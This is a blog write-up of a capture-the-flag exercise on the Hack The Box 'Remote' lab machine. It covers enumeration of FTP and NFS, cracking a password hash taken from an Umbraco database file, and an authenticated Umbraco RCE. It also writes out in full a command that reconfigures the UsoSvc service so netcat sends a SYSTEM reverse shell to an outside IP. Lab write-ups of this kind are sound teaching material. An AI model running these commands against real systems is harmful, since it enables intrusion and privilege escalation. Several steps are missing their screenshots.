Hack The Box - Remote Writeup

System Summary


Initial Enumeration


It's a Windows Box, but enum4linux and smbclient don't show any valuable content without authentication.

Nmap shows a couple of extra services that looks interesting (ftp and nfs)

The main webpage shows

In the "People" page there are 5 employees that might be used to do some bruteforcing.

But let's see if we can do something with ftp or nfs

FTP accept anonymous access but with no upload:

Let's see the NFS shares list:

And let's try to mount them


But unfortunately we have no write access to it.
Looking around there is a file "Umbraco.sdf" in "App_Data" folder that has some interesting strings in it:


We have some hashes


And we also know that a user is ssmith: there is no such people in the employee page.
But we can infere that user schema probably is initial of first name + lastname

The first hash (SHA1) is easily cracked and reveals a possible password: baconandcheese
T


Initial Foothold and User Flag



So next step is to try to use this information to get some kind of access.
It happens that the Umbraco CMS that is running the website can be accessed with these:

  • Username: admin@htb.local
  • password: baconandcheese


Umbraco version is 7.12.4 and it's prone to an RCE for authenticated users: https://www.exploit-db.com/exploits/46153
So we can execute arbitrary commands:


And use it to get a better access.
I chose to use mshta with metasploit to make it easy and got access:

Root Flag


Uploading netcat and winpeas we can discover that we can modify the service UsoSVC and start it:


So the trick should be this:

  • upload nc.exe somewhere (e.g. c:\tmp)
  • Reconfigure the UsoSvc service using the command
    • sc.exe config usosvc binPath="c:\tmp\nc.exe 10.10.16.78 5555 -e c:\windows\system32\cmd.exe"
  • Running the server UsoSvc
    • sc.exe start usosvc
  • Wait for the shell connect back


We got the shell back and quickly go in c:\users\administrator\Desktop and get the flag

Quickly because the shell is staying alive until someone else reconfigure the service and starts it again.
On the free servers it can happen very frequently

By -
Labels:

No comments:

Post a Comment

Note: Only a member of this blog may post a comment.

Subscribe to: Post Comments (Atom)